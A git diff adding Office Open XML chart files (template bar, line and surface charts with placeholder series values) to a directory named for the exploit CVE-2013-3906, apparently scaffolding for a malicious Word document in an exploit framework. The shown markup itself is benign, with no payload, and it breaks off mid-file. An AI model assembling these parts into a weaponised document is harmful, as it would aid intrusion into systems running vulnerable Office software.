+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:bar3DChart>
+<c:barDir val="col"/>
+<c:grouping val="standard"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:shape val="cylinder"/>
+<c:axId val="51657728"/>
+<c:axId val="69190400"/>
+<c:axId val="25292288"/>
+</c:bar3DChart>
+<c:catAx>
+<c:axId val="51657728"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="69190400"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="69190400"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="51657728"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+<c:serAx>
+<c:axId val="25292288"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="69190400"/>
+<c:crosses val="autoZero"/>
+</c:serAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/charts/chart2.xml b/data/exploits/CVE-2013-3906/word/charts/chart2.xml
new file mode 100755
index 0000000000..cafdd358c1
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/charts/chart2.xml
@@ -0,0 +1,220 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:rAngAx val="1"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:bar3DChart>
+<c:barDir val="col"/>
+<c:grouping val="clustered"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:shape val="pyramid"/>
+<c:axId val="71774208"/>
+<c:axId val="71776128"/>
+<c:axId val="0"/>
+</c:bar3DChart>
+<c:catAx>
+<c:axId val="71774208"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="71776128"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="71776128"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="71774208"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/charts/chart3.xml b/data/exploits/CVE-2013-3906/word/charts/chart3.xml
new file mode 100755
index 0000000000..0b4c47a1a9
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/charts/chart3.xml
@@ -0,0 +1,230 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:bar3DChart>
+<c:barDir val="col"/>
+<c:grouping val="standard"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:shape val="pyramid"/>
+<c:axId val="50252800"/>
+<c:axId val="50255744"/>
+<c:axId val="71870208"/>
+</c:bar3DChart>
+<c:catAx>
+<c:axId val="50252800"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50255744"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="50255744"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50252800"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+<c:serAx>
+<c:axId val="71870208"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50255744"/>
+<c:crosses val="autoZero"/>
+</c:serAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/charts/chart4.xml b/data/exploits/CVE-2013-3906/word/charts/chart4.xml
new file mode 100755
index 0000000000..da8085b066
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/charts/chart4.xml
@@ -0,0 +1,110 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:title>
+<c:layout/>
+</c:title>
+<c:view3D>
+<c:rotX val="30"/>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:bar3DChart>
+<c:barDir val="bar"/>
+<c:grouping val="clustered"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Sales</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Sq.. 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Sq.. 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Sq.. 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Sq.. 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>8.1999999999999993</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>3.2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.4</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>1.2</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:shape val="box"/>
+<c:axId val="50777472"/>
+<c:axId val="50780032"/>
+<c:axId val="0"/>
+</c:bar3DChart>
+<c:valAx>
+<c:axId val="50780032"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50777472"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+<c:catAx>
+<c:axId val="50777472"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50780032"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/charts/chart5.xml b/data/exploits/CVE-2013-3906/word/charts/chart5.xml
new file mode 100755
index 0000000000..061cf33531
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/charts/chart5.xml
@@ -0,0 +1,228 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:line3DChart>
+<c:grouping val="standard"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:axId val="50940928"/>
+<c:axId val="68729472"/>
+<c:axId val="78014208"/>
+</c:line3DChart>
+<c:catAx>
+<c:axId val="50940928"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="68729472"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="68729472"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50940928"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+<c:serAx>
+<c:axId val="78014208"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="68729472"/>
+<c:crosses val="autoZero"/>
+</c:serAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/charts/chart6.xml b/data/exploits/CVE-2013-3906/word/charts/chart6.xml
new file mode 100755
index 0000000000..63ca82beda
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/charts/chart6.xml
@@ -0,0 +1,238 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:surface3DChart>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
